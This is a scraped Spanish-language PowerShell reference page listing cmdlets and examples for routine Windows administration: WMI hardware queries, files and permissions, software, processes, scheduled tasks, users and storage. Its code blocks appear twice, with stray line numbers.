Alias rujb -> Resume-Job

Alias rv -> Remove-Variable

Alias rvpa -> Resolve-Path

Alias rwmi -> Remove-WMIObject

Alias sajb -> Start-Job

Alias sal -> Set-Alias

Alias saps -> Start-Process

Alias sasv -> Start-Service

Alias sbp -> Set-PSBreakpoint

Alias sc -> Set-Content

Alias select -> Select-Object

Alias set -> Set-Variable

Alias shcm -> Show-Command

Alias si -> Set-Item

Alias sl -> Set-Location

Alias sleep -> Start-Sleep

Alias sls -> Select-String

Alias sort -> Sort-Object

Alias sp -> Set-ItemProperty

Alias spjb -> Stop-Job

Alias spps -> Stop-Process

Alias spsv -> Stop-Service

Alias start -> Start-Process

Alias sujb -> Suspend-Job

Alias sv -> Set-Variable

Alias swmi -> Set-WMIInstance

Alias tee -> Tee-Object

Alias trcm -> Trace-Command

Alias type -> Get-Content

Alias wget -> Invoke-WebRequest

Alias where -> Where-Object

Alias wjb -> Wait-Job

Alias write -> Write-Output

Filesystem Hardware Memory Network Operating Systems Permissions PowerShell Processes Schedule tasks Services Software Threads Updates Users

Cmdlets relacionados con tareas básicas y de administración en el sistema operativo Windows

28/04/201511/08/2017

Gestión del hardware Gestión de archivos Agregar/Eliminar software Actualizar Gestión de procesos Programación de tareas Gestión de usuarios Gestión del almacenamiento Gestión de la red Copias de seguridad Reparación del sistema Rendimiento del sistema Gestión del hardware

#Computer System Hardware Classes
#Cooling Device Classes
Get-WmiObject Win32_Fan
Get-WmiObject Win32_HeatPipe
Get-WmiObject Win32_Refrigeration
Get-WmiObject Win32_TemperatureProbe

#Input Device Classes
Get-WmiObject Win32_Keyboard
Get-WmiObject Win32_PointingDevice

#Mass Storage Classes
Get-WmiObject Win32_AutochkSetting
Get-WmiObject Win32_CDROMDrive
Get-WmiObject Win32_DiskDrive
Get-WmiObject Win32_FloppyDrive
Get-WmiObject Win32_PhysicalMedia
Get-WmiObject Win32_TapeDrive

#Motherboard, Controller, and Port Classes
Get-WmiObject Win32_1394Controller
Get-WmiObject Win32_1394ControllerDevice
Get-WmiObject Win32_AllocatedResource
Get-WmiObject Win32_AssociatedProcessorMemory
Get-WmiObject Win32_BaseBoard
Get-WmiObject Win32_BIOS
Get-WmiObject Win32_Bus
Get-WmiObject Win32_CacheMemory
Get-WmiObject Win32_ControllerHasHub
Get-WmiObject Win32_DeviceBus
Get-WmiObject Win32_DeviceMemoryAddress
Get-WmiObject Win32_DeviceSettings
Get-WmiObject Win32_DMAChannel
Get-WmiObject Win32_FloppyController
Get-WmiObject Win32_IDEController
Get-WmiObject Win32_IDEControllerDevice
Get-WmiObject Win32_InfraredDevice
Get-WmiObject Win32_IRQResource
Get-WmiObject Win32_MemoryArray
Get-WmiObject Win32_MemoryArrayLocation
Get-WmiObject Win32_MemoryDevice
Get-WmiObject Win32_MemoryDeviceArray
Get-WmiObject Win32_MemoryDeviceLocation
Get-WmiObject Win32_MotherboardDevice
Get-WmiObject Win32_OnBoardDevice
Get-WmiObject Win32_ParallelPort
Get-WmiObject Win32_PCMCIAController
Get-WmiObject Win32_PhysicalMemory
Get-WmiObject Win32_PhysicalMemoryArray
Get-WmiObject Win32_PhysicalMemoryLocation
Get-WmiObject Win32_PNPAllocatedResource
Get-WmiObject Win32_PNPDevice
Get-WmiObject Win32_PNPEntity
Get-WmiObject Win32_PortConnector
Get-WmiObject Win32_PortResource
Get-WmiObject Win32_Processor
Get-WmiObject Win32_SCSIController
Get-WmiObject Win32_SCSIControllerDevice
Get-WmiObject Win32_SerialPort
Get-WmiObject Win32_SerialPortConfiguration
Get-WmiObject Win32_SerialPortSetting
Get-WmiObject Win32_SMBIOSMemory
Get-WmiObject Win32_SoundDevice
Get-WmiObject Win32_SystemBIOS
Get-WmiObject Win32_SystemDriverPNPEntity
Get-WmiObject Win32_SystemEnclosure
Get-WmiObject Win32_SystemMemoryResource
Get-WmiObject Win32_SystemSlot
Get-WmiObject Win32_USBController
Get-WmiObject Win32_USBControllerDevice
Get-WmiObject Win32_USBHub
 
#Networking Device Classes
Get-WmiObject Win32_NetworkAdapter
Get-WmiObject Win32_NetworkAdapterConfiguration
Get-WmiObject Win32_NetworkAdapterSetting
 
#Power Classes
Get-WmiObject Win32_Battery
Get-WmiObject Win32_CurrentProbe
Get-WmiObject Win32_PortableBattery
Get-WmiObject Win32_PowerManagementEvent
Get-WmiObject Win32_VoltageProbe
 
#Printing Classes
Get-WmiObject Win32_DriverForDevice
Get-WmiObject Win32_Printer
Get-WmiObject Win32_PrinterConfiguration
Get-WmiObject Win32_PrinterController
Get-WmiObject Win32_PrinterDriver
Get-WmiObject Win32_PrinterDriverDll
Get-WmiObject Win32_PrinterSetting
Get-WmiObject Win32_PrintJob
Get-WmiObject Win32_TCPIPPrinterPort
 
#Telephony Classes
Get-WmiObject Win32_POTSModem
Get-WmiObject Win32_POTSModemToSerialPort
 
#Video and Monitor Classes
Get-WmiObject Win32_DesktopMonitor
Get-WmiObject Win32_DisplayControllerConfiguration
Get-WmiObject Win32_VideoController
Get-WmiObject Win32_VideoSettings

Get-WmiObject Win32_Processor
Get-WmiObject -Class Win32_Processor
Get-WmiObject -query "select * from Win32_Processor"

Get-WmiObject Win32_PnPEntity
Get-WmiObject -Class Win32_PnPEntity
Get-WmiObject -query “select * from Win32_PnPEntity”

Get-WmiObject Win32_battery
Get-WmiObject -Class Win32_battery
Get-WmiObject -query “select * from Win32_battery”

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

#Computer System Hardware Classes

#Cooling Device Classes

Get-WmiObject Win32_Fan

Get-WmiObject Win32_HeatPipe

Get-WmiObject Win32_Refrigeration

Get-WmiObject Win32_TemperatureProbe

#Input Device Classes

Get-WmiObject Win32_Keyboard

Get-WmiObject Win32_PointingDevice

#Mass Storage Classes

Get-WmiObject Win32_AutochkSetting

Get-WmiObject Win32_CDROMDrive

Get-WmiObject Win32_DiskDrive

Get-WmiObject Win32_FloppyDrive

Get-WmiObject Win32_PhysicalMedia

Get-WmiObject Win32_TapeDrive

#Motherboard, Controller, and Port Classes

Get-WmiObject Win32_1394Controller

Get-WmiObject Win32_1394ControllerDevice

Get-WmiObject Win32_AllocatedResource

Get-WmiObject Win32_AssociatedProcessorMemory

Get-WmiObject Win32_BaseBoard

Get-WmiObject Win32_BIOS

Get-WmiObject Win32_Bus

Get-WmiObject Win32_CacheMemory

Get-WmiObject Win32_ControllerHasHub

Get-WmiObject Win32_DeviceBus

Get-WmiObject Win32_DeviceMemoryAddress

Get-WmiObject Win32_DeviceSettings

Get-WmiObject Win32_DMAChannel

Get-WmiObject Win32_FloppyController

Get-WmiObject Win32_IDEController

Get-WmiObject Win32_IDEControllerDevice

Get-WmiObject Win32_InfraredDevice

Get-WmiObject Win32_IRQResource

Get-WmiObject Win32_MemoryArray

Get-WmiObject Win32_MemoryArrayLocation

Get-WmiObject Win32_MemoryDevice

Get-WmiObject Win32_MemoryDeviceArray

Get-WmiObject Win32_MemoryDeviceLocation

Get-WmiObject Win32_MotherboardDevice

Get-WmiObject Win32_OnBoardDevice

Get-WmiObject Win32_ParallelPort

Get-WmiObject Win32_PCMCIAController

Get-WmiObject Win32_PhysicalMemory

Get-WmiObject Win32_PhysicalMemoryArray

Get-WmiObject Win32_PhysicalMemoryLocation

Get-WmiObject Win32_PNPAllocatedResource

Get-WmiObject Win32_PNPDevice

Get-WmiObject Win32_PNPEntity

Get-WmiObject Win32_PortConnector

Get-WmiObject Win32_PortResource

Get-WmiObject Win32_Processor

Get-WmiObject Win32_SCSIController

Get-WmiObject Win32_SCSIControllerDevice

Get-WmiObject Win32_SerialPort

Get-WmiObject Win32_SerialPortConfiguration

Get-WmiObject Win32_SerialPortSetting

Get-WmiObject Win32_SMBIOSMemory

Get-WmiObject Win32_SoundDevice

Get-WmiObject Win32_SystemBIOS

Get-WmiObject Win32_SystemDriverPNPEntity

Get-WmiObject Win32_SystemEnclosure

Get-WmiObject Win32_SystemMemoryResource

Get-WmiObject Win32_SystemSlot

Get-WmiObject Win32_USBController

Get-WmiObject Win32_USBControllerDevice

Get-WmiObject Win32_USBHub

#Networking Device Classes

Get-WmiObject Win32_NetworkAdapter

Get-WmiObject Win32_NetworkAdapterConfiguration

Get-WmiObject Win32_NetworkAdapterSetting

#Power Classes

Get-WmiObject Win32_Battery

Get-WmiObject Win32_CurrentProbe

Get-WmiObject Win32_PortableBattery

Get-WmiObject Win32_PowerManagementEvent

Get-WmiObject Win32_VoltageProbe

#Printing Classes

Get-WmiObject Win32_DriverForDevice

Get-WmiObject Win32_Printer

Get-WmiObject Win32_PrinterConfiguration

Get-WmiObject Win32_PrinterController

Get-WmiObject Win32_PrinterDriver

Get-WmiObject Win32_PrinterDriverDll

Get-WmiObject Win32_PrinterSetting

Get-WmiObject Win32_PrintJob

Get-WmiObject Win32_TCPIPPrinterPort

#Telephony Classes

Get-WmiObject Win32_POTSModem

Get-WmiObject Win32_POTSModemToSerialPort

#Video and Monitor Classes

Get-WmiObject Win32_DesktopMonitor

Get-WmiObject Win32_DisplayControllerConfiguration

Get-WmiObject Win32_VideoController

Get-WmiObject Win32_VideoSettings

Get-WmiObject Win32_Processor

Get-WmiObject -Class Win32_Processor

Get-WmiObject -query "select * from Win32_Processor"

Get-WmiObject Win32_PnPEntity

Get-WmiObject -Class Win32_PnPEntity

Get-WmiObject -query “select * from Win32_PnPEntity”

Get-WmiObject Win32_battery

Get-WmiObject -Class Win32_battery

Get-WmiObject -query “select * from Win32_battery”

Ejemplos

Get-WmiObject win32_processor | Select-Object LoadPercentage
Get-WmiObject -query "select NumberOfCores from Win32_Processor"
Get-WmiObject -Class Win32_Processor | Select-Object NumberOfCores
Get-WmiObject -query “select Name,Status from Win32_PnPEntity”
Get-WmiObject -query “select * from Win32_PnPEntity” | Select-Object Name, Status
Get-WmiObject -query "select * from Win32_PnPEntity where caption like '%cam%'"
Get-WmiObject Win32_PnPEntity | where {$_.caption -match 'webcam'}
gwmi Win32_USBControllerDevice |%{[wmi]($_.Dependent)} | Sort Manufacturer,Description,DeviceID | Ft -GroupBy Manufacturer Description,Service,DeviceID
Get-WmiObject -Class win32_battery

Get-WmiObject win32_processor | Select-Object LoadPercentage

Get-WmiObject -query "select NumberOfCores from Win32_Processor"

Get-WmiObject -Class Win32_Processor | Select-Object NumberOfCores

Get-WmiObject -query “select Name,Status from Win32_PnPEntity”

Get-WmiObject -query “select * from Win32_PnPEntity” | Select-Object Name, Status

Get-WmiObject -query "select * from Win32_PnPEntity where caption like '%cam%'"

Get-WmiObject Win32_PnPEntity | where {$_.caption -match 'webcam'}

gwmi Win32_USBControllerDevice |%{[wmi]($_.Dependent)} | Sort Manufacturer,Description,DeviceID | Ft -GroupBy Manufacturer Description,Service,DeviceID

Get-WmiObject -Class win32_battery

Gestión de archivos

#Crear o modificar un archivo
New-Item

#Crear un directorio
New-Item

#Ver el contenido de un archivo
Get-Content

#Acceder al contenido de un directorio
Set-Location

#Listar el contenido de un directorio
Get-ChildItem

#Eliminar un archivo
Remove-Item

#Eliminar un directorio
Remove-Item

#Copiar un archivo o un directorio
Copy-Item

#Mover un archivo o un directorio
Move-Item

#Renombrar un archivo o un directorio
Rename-Item

#Comprimir y descomprimir un archivo o un directorio
Compress-Archive
Expand-Archive

#Imprimir
Out-Printer

#Ver carpetas compartidas
Get-SmbShare
Get-WmiObject -Class Win32_Share

#Compartir carpeta
New-SmbShare

#Ver y asignar permisos
Get-Acl
Set-Acl
New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule

#Crear o modificar un archivo

New-Item

#Crear un directorio

New-Item

#Ver el contenido de un archivo

Get-Content

#Acceder al contenido de un directorio

Set-Location

#Listar el contenido de un directorio

Get-ChildItem

#Eliminar un archivo

Remove-Item

#Eliminar un directorio

Remove-Item

#Copiar un archivo o un directorio

Copy-Item

#Mover un archivo o un directorio

Move-Item

#Renombrar un archivo o un directorio

Rename-Item

#Comprimir y descomprimir un archivo o un directorio

Compress-Archive

Expand-Archive

#Imprimir

Out-Printer

#Ver carpetas compartidas

Get-SmbShare

Get-WmiObject -Class Win32_Share

#Compartir carpeta

New-SmbShare

#Ver y asignar permisos

Get-Acl

Set-Acl

New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule

Ejemplos

#Comprimir
Compress-Archive -LiteralPath C:\powershell\example.txt –CompressionLevel Optimal -DestinationPath C:\powershell\comprimido.zip

#Actualizar un archivo comprimido
Compress-Archive -LiteralPath C:\powershell\example2.txt -Update -DestinationPath C:\powershell\comprimido.zip

#Descomprimir
Expand-Archive -LiteralPath C:\powershell\comprimido.zip -DestinationPath C:\powershell\descomprimir

#Crear y recurso compartido
New-SmbShare -Name fso -Path F:\power

#Crear y asignar permisos a un recurso compartido
New-SmbShare -Name fso -Path F:\power –FullAccess administrador -ReadAccess Everyone

#Ver permisos
Get-Acl D:\power

#Añadir permisos mediante reglas de acceso
$permisos = Get-Acl -Path D:\power
#Crear regla de acceso
#System.Security.AccessControl.FileSystemAccessRule: Representa una abstracción de una entrada de control de acceso (ACE) que define una regla de acceso para un archivo o directorio
$permisoadd = 'Todos', 'FullControl', 'ContainerInherit, ObjectInherit', 'None', 'Allow'
$regla = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule -ArgumentList $permisoadd
$permisos.SetAccessRule($regla)
#Añadir permisos a la carpeta
$permisos | Set-Acl -Path $ruta

#Comprimir

Compress-Archive -LiteralPath C:\powershell\example.txt –CompressionLevel Optimal -DestinationPath C:\powershell\comprimido.zip

#Actualizar un archivo comprimido

Compress-Archive -LiteralPath C:\powershell\example2.txt -Update -DestinationPath C:\powershell\comprimido.zip

#Descomprimir

Expand-Archive -LiteralPath C:\powershell\comprimido.zip -DestinationPath C:\powershell\descomprimir

#Crear y recurso compartido

New-SmbShare -Name fso -Path F:\power

#Crear y asignar permisos a un recurso compartido

New-SmbShare -Name fso -Path F:\power –FullAccess administrador -ReadAccess Everyone

#Ver permisos

Get-Acl D:\power

#Añadir permisos mediante reglas de acceso

$permisos = Get-Acl -Path D:\power

#Crear regla de acceso

#System.Security.AccessControl.FileSystemAccessRule: Representa una abstracción de una entrada de control de acceso (ACE) que define una regla de acceso para un archivo o directorio

$permisoadd = 'Todos', 'FullControl', 'ContainerInherit, ObjectInherit', 'None', 'Allow'

$regla = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule -ArgumentList $permisoadd

$permisos.SetAccessRule($regla)

#Añadir permisos a la carpeta

$permisos | Set-Acl -Path $ruta

Agregar/Eliminar software

Get-Package
Get-WmiObject -Class Win32_Product

Install-Package

Get-Package

Get-WmiObject -Class Win32_Product

Install-Package

Ejemplos

#Ver el nombre de programas instalados
(Get-Package).name
(Get-WmiObject -Class Win32_Product).name

#Número de programas instalados
(Get-WmiObject -Class Win32_Product).count

#Instalar un programa
Install-Package filezilla

#Ver en el Registro información sobre el software instalado
Get-ChildItem hklm:\software\microsoft\windows\currentversion\uninstall | ForEach-Object {(Get-ItemProperty $_.pspath).DisplayName}

#Ver el nombre de programas instalados

(Get-Package).name

(Get-WmiObject -Class Win32_Product).name

#Número de programas instalados

(Get-WmiObject -Class Win32_Product).count

#Instalar un programa

Install-Package filezilla

#Ver en el Registro información sobre el software instalado

Get-ChildItem hklm:\software\microsoft\windows\currentversion\uninstall | ForEach-Object {(Get-ItemProperty $_.pspath).DisplayName}

Actualizar

Get-HotFix

1	Get-HotFix

Ejemplos

#Información sobre actualizaciones instaladas
Get-HotFix | Select-Object HotFixID,InstalledOn

#Agrupar por descripción las actualizaciones instaladas en el equipo
Get-HotFix | Group-Object Description

#Listar por fecha las actualizaciones instaladas en el equipo
Get-HotFix | Sort-Object InstalledOn

#Información sobre actualizaciones instaladas

Get-HotFix | Select-Object HotFixID,InstalledOn

#Agrupar por descripción las actualizaciones instaladas en el equipo

Get-HotFix | Group-Object Description

#Listar por fecha las actualizaciones instaladas en el equipo

Get-HotFix | Sort-Object InstalledOn

Gestión de procesos

Get-Process
gps
ps
Get-WmiObject -Class win32_process

Stop-Process

Get-WmiObject -Class Win32_Thread

Get-Service
Get-WmiObject -Class Win32_Service
Get-WmiObject -query "select * from win32_service"

Get-Process

gps

Get-WmiObject -Class win32_process

Stop-Process

Get-WmiObject -Class Win32_Thread

Get-Service

Get-WmiObject -Class Win32_Service

Get-WmiObject -query "select * from win32_service"

Ejemplos

#Obtener información ampliada sobre procesos
Get-Process | Select-Object *
gps | Select-Object *
ps | Select-Object *

#Obtener información sobre las propiedades de los procesos
Get-Process | Select-Object Name, Id, Company
gps | Select-Object Name, Id, Company
ps | Select-Object Name, Id, Company

#Obtener información ordenada sobre las propiedades de los procesos
Get-Process | Select-Object Name, Id, Company | Sort-Object Name
gps | Select-Object Name, Id, Company | Sort-Object Name
ps | Select-Object Name, Id, Company | Sort-Object Name

#Obtener los 5 primeros procesos ordenados
Get-Process | Select-Object Name, Id, Company | Sort-Object Name | Select-Object -First 5
gps | Select-Object Name, Id, Company | Sort-Object Name | Select-Object -First 5
ps | Select-Object Name, Id, Company | Sort-Object Name | Select-Object -First 5

#Contador de procesos
(Get-WmiObject Win32_OperatingSystem).NumberOfProcesses
(Get-Process).count

#Información sobre procesos
Get-Process | Select-Object Name,Path,Company,CPU,Product,TotalProcessorTime,StartTime

#Seleccionar nombre de procesos y compañía
Get-Process | select Company,Name

#Información sobre procesos
#Name
#CPUSeconds
#WorkingSetMB
#TotalProcessorTime
#Description
Get-Process | ? {$_.TotalProcessorTime -ne $Null} | Select-Object -Property Name, @{Name="CPUSeconds"; Expression = {($_.CPU)}},@{Name="WorkingSetMB"; Expression = {($_.WorkingSet / 1mb)}},TotalProcessorTime, Description

#DLL
Get-Process | select -expand MainModule
Get-Process | select -expand Modules

#Mostrar todos los procesos y sus propiedades
Get-Process | select *
Get-WmiObject win32_process

#Mostrar los procesos que ejecuta un usuario
Get-WmiObject win32_process |% {Write-Host $_.processname $_.getowner().user}

#Mostrar información sobre un proceso indicando el nombre del proceso
Get-Process -Name notepad

#Mostrar información sobre un proceso indicando el ID del proceso
Get-Process -Id 2732

#Ordenar procesos por CPU y por memoria usada
Get-Process | Sort-Object CPU,PM

#Mostrar de forma jerárquica los procesos que se están ejecutando
Get-Process | Select * | Format-Custom

#Mostrar los identificadores de los procesos junto con sus identificadores padre
Get-WmiObject win32_process | Select-Object ParentProcessId,ProcessId

#Mostrar las propiedades especificadas de los procesos
Get-Process | Select-Object Id,CPU,PM

#Mostrar el tiempo transcurrido en la ejecución de un proceso
Get-Process | Select-Object Id,TotalProcessorTime

#Formas de arrancar un proceso
$str = "Get-Process"
Invoke-Expression $str
$scriptblock = {ping host3}
Invoke-Command -scriptblock $scriptblock -computername "host1","host2"
#Información sobre hilos
(Get-Process chrome | Select-Object Threads).Threads
Get-Process | select -expand Threads

#Prioridad de los hilos
(Get-WmiObject -Class Win32_Thread) | Select-Object ProcessHandle,Priority,PriorityBase | Sort-Object ProcessHandle
(Get-Process).Threads | Select-Object Id,CurrentPriority,BasePriority | Sort-Object Id

#Estado de los hilos
(Get-WmiObject -Class Win32_Thread) | Select-Object ProcessHandle,ThreadState | Sort-Object ProcessHandle
(Get-Process).Threads | Select-Object Id,ThreadState | Sort-Object Id

#WS(K): The size of the working set of the process, in kilobytes. The working set consists of the pages of memory that were recently referenced by the process
@(Get-Process).where{$_.WorkingSet -gt 100MB}
@(Get-Process).where{$_.WS -gt 100MB}

#Ruta donde se ejecutan los procesos
Get-Process -FileVersionInfo

#Procesos que no responden
(Get-Process).Where{-not $_.Responding}

#Buscar procesos que se están ejecutando
(Get-Process).Where{$_.Name -like "chrome"}

#Formas de parar un proceso
Get-Process -Name notepad | Stop-Process
Get-WmiObject -Class Win32_Process -Filter “name=’notepad.exe'” | Invoke-WmiMethod -Name Terminate
Get-Process -Name notepad | ForEach-Object -Process {$_.Kill()}

#Listar y parar procesos
Get-Process | Out-GridView -PassThru | Stop-Process

#Información sobre servicios
Get-Service
Get-Service | Select-Object Name,Status
Get-Service | Where-Object Status -EQ 'Running'
Get-Service | Where-Object Status -EQ 'Stopped'

#Listar servicios WQL
Get-WmiObject -query "select * from win32_service"

#Servicios que están Running
Get-WmiObject -query "select * from win32_service where state='Running'"

#Identificar servicios mediante identificadores de procesos
Get-WmiObject -Class Win32_Service | Select-Object Name,ProcessID

#Información en el resgistro sobre estado de los servicios
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*' | % {Write-host $_.DisplayName : $_.Start}

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

#Obtener información ampliada sobre procesos

Get-Process | Select-Object *

gps | Select-Object *

ps | Select-Object *

#Obtener información sobre las propiedades de los procesos

Get-Process | Select-Object Name, Id, Company

gps | Select-Object Name, Id, Company

ps | Select-Object Name, Id, Company

#Obtener información ordenada sobre las propiedades de los procesos

Get-Process | Select-Object Name, Id, Company | Sort-Object Name

gps | Select-Object Name, Id, Company | Sort-Object Name

ps | Select-Object Name, Id, Company | Sort-Object Name

#Obtener los 5 primeros procesos ordenados

Get-Process | Select-Object Name, Id, Company | Sort-Object Name | Select-Object -First 5

gps | Select-Object Name, Id, Company | Sort-Object Name | Select-Object -First 5

ps | Select-Object Name, Id, Company | Sort-Object Name | Select-Object -First 5

#Contador de procesos

(Get-WmiObject Win32_OperatingSystem).NumberOfProcesses

(Get-Process).count

#Información sobre procesos

Get-Process | Select-Object Name,Path,Company,CPU,Product,TotalProcessorTime,StartTime

#Seleccionar nombre de procesos y compañía

Get-Process | select Company,Name

#Información sobre procesos

#Name

#CPUSeconds

#WorkingSetMB

#TotalProcessorTime

#Description

Get-Process | ? {$_.TotalProcessorTime -ne $Null} | Select-Object -Property Name, @{Name="CPUSeconds"; Expression = {($_.CPU)}},@{Name="WorkingSetMB"; Expression = {($_.WorkingSet / 1mb)}},TotalProcessorTime, Description

#DLL

Get-Process | select -expand MainModule

Get-Process | select -expand Modules

#Mostrar todos los procesos y sus propiedades

Get-Process | select *

Get-WmiObject win32_process

#Mostrar los procesos que ejecuta un usuario

Get-WmiObject win32_process |% {Write-Host $_.processname $_.getowner().user}

#Mostrar información sobre un proceso indicando el nombre del proceso

Get-Process -Name notepad

#Mostrar información sobre un proceso indicando el ID del proceso

Get-Process -Id 2732

#Ordenar procesos por CPU y por memoria usada

Get-Process | Sort-Object CPU,PM

#Mostrar de forma jerárquica los procesos que se están ejecutando

Get-Process | Select * | Format-Custom

#Mostrar los identificadores de los procesos junto con sus identificadores padre

Get-WmiObject win32_process | Select-Object ParentProcessId,ProcessId

#Mostrar las propiedades especificadas de los procesos

Get-Process | Select-Object Id,CPU,PM

#Mostrar el tiempo transcurrido en la ejecución de un proceso

Get-Process | Select-Object Id,TotalProcessorTime

#Formas de arrancar un proceso

$str = "Get-Process"

Invoke-Expression $str

$scriptblock = {ping host3}

Invoke-Command -scriptblock $scriptblock -computername "host1","host2"

#Información sobre hilos

(Get-Process chrome | Select-Object Threads).Threads

Get-Process | select -expand Threads

#Prioridad de los hilos

(Get-WmiObject -Class Win32_Thread) | Select-Object ProcessHandle,Priority,PriorityBase | Sort-Object ProcessHandle

(Get-Process).Threads | Select-Object Id,CurrentPriority,BasePriority | Sort-Object Id

#Estado de los hilos

(Get-WmiObject -Class Win32_Thread) | Select-Object ProcessHandle,ThreadState | Sort-Object ProcessHandle

(Get-Process).Threads | Select-Object Id,ThreadState | Sort-Object Id

#WS(K): The size of the working set of the process, in kilobytes. The working set consists of the pages of memory that were recently referenced by the process

@(Get-Process).where{$_.WorkingSet -gt 100MB}

@(Get-Process).where{$_.WS -gt 100MB}

#Ruta donde se ejecutan los procesos

Get-Process -FileVersionInfo

#Procesos que no responden

(Get-Process).Where{-not $_.Responding}

#Buscar procesos que se están ejecutando

(Get-Process).Where{$_.Name -like "chrome"}

#Formas de parar un proceso

Get-Process -Name notepad | Stop-Process

Get-WmiObject -Class Win32_Process -Filter “name=’notepad.exe'” | Invoke-WmiMethod -Name Terminate

Get-Process -Name notepad | ForEach-Object -Process {$_.Kill()}

#Listar y parar procesos

Get-Process | Out-GridView -PassThru | Stop-Process

#Información sobre servicios

Get-Service

Get-Service | Select-Object Name,Status

Get-Service | Where-Object Status -EQ 'Running'

Get-Service | Where-Object Status -EQ 'Stopped'

#Listar servicios WQL

Get-WmiObject -query "select * from win32_service"

#Servicios que están Running

Get-WmiObject -query "select * from win32_service where state='Running'"

#Identificar servicios mediante identificadores de procesos

Get-WmiObject -Class Win32_Service | Select-Object Name,ProcessID

#Información en el resgistro sobre estado de los servicios

Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*' | % {Write-host $_.DisplayName : $_.Start}

Programación de tareas

New-ScheduledTaskAction
New-ScheduledTaskTrigger
Register-ScheduledTask

New-ScheduledTaskAction

New-ScheduledTaskTrigger

Ejemplos

$action=New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -command D:\mysqlmail.ps1'
$trigger=New-ScheduledTaskTrigger -Daily -At 9am
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "TareaProgramada" -Description "Comprobación de valor"

$action=New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -command D:\mysqlmail.ps1'

$trigger=New-ScheduledTaskTrigger -Daily -At 9am

Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "TareaProgramada" -Description "Comprobación de valor"

Gestión de usuarios

#Windows 10
Add-LocalGroupMember
Disable-LocalUser
Enable-LocalUser
Get-LocalGroup
Get-LocalGroupMember
Get-LocalUser
New-LocalGroup
New-LocalUser
Remove-LocalGroup
Remove-LocalGroupMember
Remove-LocalUser
Rename-LocalGroup
Rename-LocalUser
Set-LocalGroup
Set-LocalUser

#Active Directory
Get-ADUser
New-ADUser
Set-ADAccountPassword
Remove-ADUser
Enable-ADAccount
Disable-ADAccount

Get-ADGroup
New-ADGroup
Add-ADGroupMember
Remove-ADGroup

#Windows 10

Add-LocalGroupMember

Disable-LocalUser

Enable-LocalUser

Get-LocalGroup

Get-LocalGroupMember

Get-LocalUser

New-LocalGroup

New-LocalUser

Remove-LocalGroup

Remove-LocalGroupMember

Remove-LocalUser

Rename-LocalGroup

Rename-LocalUser

Set-LocalGroup

Set-LocalUser

#Active Directory

Get-ADUser

New-ADUser

Set-ADAccountPassword

Remove-ADUser

Enable-ADAccount

Disable-ADAccount

Get-ADGroup

New-ADGroup

Add-ADGroupMember

Remove-ADGroup

Gestión del almacenamiento

Flush-Volume
Initialize-Volume
Write-FileSystemCache
Add-InitiatorIdToMaskingSet
Add-PartitionAccessPath
Add-PhysicalDisk
Add-TargetPortToMaskingSet
Add-VirtualDiskToMaskingSet
Clear-Disk
Clear-FileStorageTier
Connect-VirtualDisk
Disable-PhysicalDiskIndication
Disable-StorageEnclosureIdentification
Disconnect-VirtualDisk
Dismount-DiskImage
Enable-PhysicalDiskIndication
Enable-StorageEnclosureIdentification
Format-Volume
Get-Disk
Get-DiskImage
Get-FileIntegrity
Get-FileStorageTier
Get-InitiatorId
Get-InitiatorPort
Get-MaskingSet
Get-OffloadDataTransferSetting
Get-Partition
Get-PartitionSupportedSize
Get-PhysicalDisk
Get-ResiliencySetting
Get-StorageEnclosure
Get-StorageEnclosureVendorData
Get-StorageJob
Get-StorageNode
Get-StoragePool
Get-StorageProvider
Get-StorageReliabilityCounter
Get-StorageSetting
Get-StorageSubSystem
Get-StorageTier
Get-StorageTierSupportedSize
Get-SupportedClusterSizes
Get-SupportedFileSystems
Get-TargetPort
Get-TargetPortal
Get-VirtualDisk
Get-VirtualDiskSupportedSize
Get-Volume
Get-VolumeCorruptionCount
Get-VolumeScrubPolicy
Hide-VirtualDisk
Initialize-Disk
Mount-DiskImage
New-MaskingSet
New-Partition
New-StoragePool
New-StorageSubsystemVirtualDisk
New-StorageTier
New-VirtualDisk
New-VirtualDiskClone
New-VirtualDiskSnapshot
New-Volume
Optimize-Volume
Register-StorageSubsystem
Remove-InitiatorId
Remove-InitiatorIdFromMaskingSet
Remove-MaskingSet
Remove-Partition
Remove-PartitionAccessPath
Remove-PhysicalDisk
Remove-StoragePool
Remove-StorageTier
Remove-TargetPortFromMaskingSet
Remove-VirtualDisk
Remove-VirtualDiskFromMaskingSet
Rename-MaskingSet
Repair-FileIntegrity
Repair-VirtualDisk
Repair-Volume
Reset-PhysicalDisk
Reset-StorageReliabilityCounter
Resize-Partition
Resize-StorageTier
Resize-VirtualDisk
Set-Disk
Set-FileIntegrity
Set-FileStorageTier
Set-InitiatorPort
Set-Partition
Set-PhysicalDisk
Set-ResiliencySetting
Set-StoragePool
Set-StorageProvider
Set-StorageSetting
Set-StorageSubSystem
Set-StorageTier
Set-VirtualDisk
Set-Volume
Set-VolumeScrubPolicy
Show-VirtualDisk
Unregister-StorageSubsystem
Update-Disk
Update-HostStorageCache
Update-StoragePool
Update-StorageProviderCache
Write-VolumeCache

Get-WmiObject -Class win32_DiskDrive
Get-WmiObject win32_volume

Get-WmiObject -Class win32_logicalDisk

100

101

102

103

104

105

106

107

108

109

110

111

Flush-Volume

Initialize-Volume

Write-FileSystemCache

Add-InitiatorIdToMaskingSet

Add-PartitionAccessPath

Add-PhysicalDisk

Add-TargetPortToMaskingSet

Add-VirtualDiskToMaskingSet

Clear-Disk

Clear-FileStorageTier

Connect-VirtualDisk

Disable-PhysicalDiskIndication

Disable-StorageEnclosureIdentification

Disconnect-VirtualDisk

Dismount-DiskImage

Enable-PhysicalDiskIndication

Enable-StorageEnclosureIdentification

Format-Volume

Get-Disk

Get-DiskImage

Get-FileIntegrity

Get-FileStorageTier

Get-InitiatorId

